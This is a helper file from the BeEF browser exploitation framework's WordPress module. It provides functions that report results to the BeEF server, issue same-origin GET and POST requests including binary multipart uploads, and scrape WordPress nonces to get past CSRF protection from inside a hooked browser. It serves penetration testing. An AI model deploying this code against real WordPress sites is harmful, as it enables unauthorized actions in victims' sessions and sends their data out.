beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/misc/wordpress/wp.js
/*
Copyright (c) Browser Exploitation Framework (BeEF) - https://beefproject.com
See the file 'doc/COPYING' for copying permission
Author @erwan_lr (WPScanTeam) - https://wpscan.org/
*/
// Pretty sure we could use jQuery as it's included by the hook.js
// Also, could all of this be moved onto WP.prototype?
/**
 * Report a message for the current command and echo it to the debug output.
 *
 * The strings 'error' and 'success' are translated into the values returned by
 * beef.are.status_error() and beef.are.status_success(); any other status
 * (including the default null) is forwarded unchanged.
 *
 * beef_command_url and beef_command_id are free variables here; they are
 * expected to be supplied by whatever wraps this file (not visible in it).
 *
 * @param {*} data - Payload handed to beef.net.send() and beef.debug().
 * @param {*} [status=null] - 'error', 'success', or a value passed through as-is.
 */
function log(data, status = null) {
  let resolved = status;

  // Loose comparison is kept on purpose so the mapping matches the original
  // for every input, not only for primitive strings.
  if (resolved == 'error') {
    resolved = beef.are.status_error();
  }
  if (resolved == 'success') {
    resolved = beef.are.status_success();
  }

  beef.net.send(beef_command_url, beef_command_id, data, resolved);
  beef.debug(data);
}
/**
 * Issue an asynchronous GET and hand the finished request to a callback.
 *
 * The response is requested as a parsed document (responseType 'document').
 * The callback runs for every completed response regardless of HTTP status,
 * so callers must check xhr.status themselves; only a transport-level failure
 * is reported through log().
 *
 * @param {string} absolute_path - URL passed to XMLHttpRequest.open().
 * @param {function(XMLHttpRequest): void} success - Called from onload with the request object.
 */
function get(absolute_path, success) {
  const request = new XMLHttpRequest();

  request.open('GET', absolute_path);
  request.responseType = 'document';

  // No status filtering here: the caller decides what counts as success.
  request.onload = function () {
    success(request);
  };

  request.onerror = function () {
    log('GET ' + absolute_path + ' could not be done', 'error');
  };

  request.send();
}
/**
 * Issue an asynchronous form-encoded POST and hand the finished request to a
 * callback.
 *
 * A string body is sent as given. Any other value is treated as a key/value
 * object whose own enumerable keys and values are percent-encoded and joined
 * as key=value pairs separated by '&'.
 *
 * The callback runs for every completed response regardless of HTTP status;
 * only a transport-level failure is reported through log().
 *
 * @param {string} absolute_path - URL passed to XMLHttpRequest.open().
 * @param {string|Object} data - Pre-encoded body, or an object to encode.
 * @param {function(XMLHttpRequest): void} success - Called from onload with the request object.
 */
function post(absolute_path, data, success) {
  let body;

  if (typeof data === 'string') {
    body = data;
  } else {
    const pairs = [];
    for (const key of Object.keys(data)) {
      pairs.push(encodeURIComponent(key) + '=' + encodeURIComponent(data[key]));
    }
    body = pairs.join('&');
  }

  const request = new XMLHttpRequest();

  request.open('POST', absolute_path);
  request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

  // No status filtering here: the caller decides what counts as success.
  request.onload = function () {
    success(request);
  };

  request.onerror = function () {
    log('POST ' + absolute_path + ' could not be done', 'error');
  };

  request.send(body);
}
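/**
 * Issue an asynchronous multipart/form-data POST whose body is a binary
 * string, and hand the finished request to a callback.
 *
 * Each character of `data` is sent as one byte (its char code masked to the
 * low 8 bits). The response is requested as a parsed document. The callback
 * runs for every completed response regardless of HTTP status; only a
 * transport-level failure is reported through log().
 *
 * Side effect: when the browser has no XMLHttpRequest.prototype.sendAsBinary,
 * one is installed on the shared prototype and stays there for every other
 * script on the page.
 *
 * @param {string} absolute_path - URL passed to XMLHttpRequest.open().
 * @param {string} boundary - Multipart boundary placed in the Content-Type
 *   header; presumably it must match the one used inside `data` (the body is
 *   built by the caller, not here).
 * @param {string} data - Binary string holding the complete request body.
 * @param {function(XMLHttpRequest): void} success - Called from onload with the request object.
 */
function post_as_binary(absolute_path, boundary, data, success) {
  var xhr = new XMLHttpRequest();

  // for WebKit-based browsers
  if (!XMLHttpRequest.prototype.sendAsBinary) {
    // Must stay a regular function: `this` is the request being sent.
    XMLHttpRequest.prototype.sendAsBinary = function (sData) {
      var nBytes = sData.length;
      var ui8Data = new Uint8Array(nBytes);

      for (var nIdx = 0; nIdx < nBytes; nIdx++) {
        // Keep only the low byte so the string is sent without re-encoding.
        ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff;
      }

      /* send as ArrayBufferView...: */
      this.send(ui8Data);
    };
  }

  xhr.open('POST', absolute_path);
  xhr.setRequestHeader('Content-Type', 'multipart/form-data; boundary=' + boundary);

  xhr.responseType = 'document';

  // Fixed: the message lacked the space after "(Binary)", so the path was
  // fused onto the prefix, unlike the messages of the other helpers.
  xhr.onerror = function () {
    log('POST (Binary) ' + absolute_path + ' could not be done', 'error');
  };

  // No status filtering here: the caller decides what counts as success.
  xhr.onload = function () {
    success(xhr);
  };

  xhr.sendAsBinary(data);
}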
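/**
 * Fetch a page and pass the `value` attribute of one of its elements to a
 * callback.
 *
 * The page is retrieved with get(), so it arrives as a parsed document. Every
 * failure (non-200 status, no parsed document, element not found) is reported
 * through log() with status 'error' and the callback is not invoked.
 *
 * Review note: a nonce rendered into a page is readable by any script running
 * in that page's origin, so it protects against cross-site requests only.
 *
 * @param {string} absolute_path - URL of the page that contains the element.
 * @param {string} nonce_id - id attribute of the element holding the nonce.
 * @param {function(?string): void} success - Receives the element's `value`
 *   attribute (null when the attribute is absent).
 */
function get_nonce(absolute_path, nonce_id, success) {
  get(absolute_path, function (xhr) {
    if (xhr.status !== 200) {
      log('GET ' + absolute_path + ' - Status: ' + xhr.status, 'error');
      return;
    }

    // responseXML is null when the body could not be parsed as a document.
    // Treat that like a missing element instead of throwing inside the onload
    // handler, where the failure would never be reported.
    var doc = xhr.responseXML;
    var nonce_tag = doc == null ? null : doc.getElementById(nonce_id);

    if (nonce_tag == null) {
      log(absolute_path + ' - Unable to find nonce tag with id ' + nonce_id, 'error');
      return;
    }

    // Declared locally: the original assigned to an undeclared `nonce`, which
    // creates a page-wide global in sloppy mode and throws in strict mode.
    var nonce = nonce_tag.getAttribute('value');

    success(nonce);
  });
}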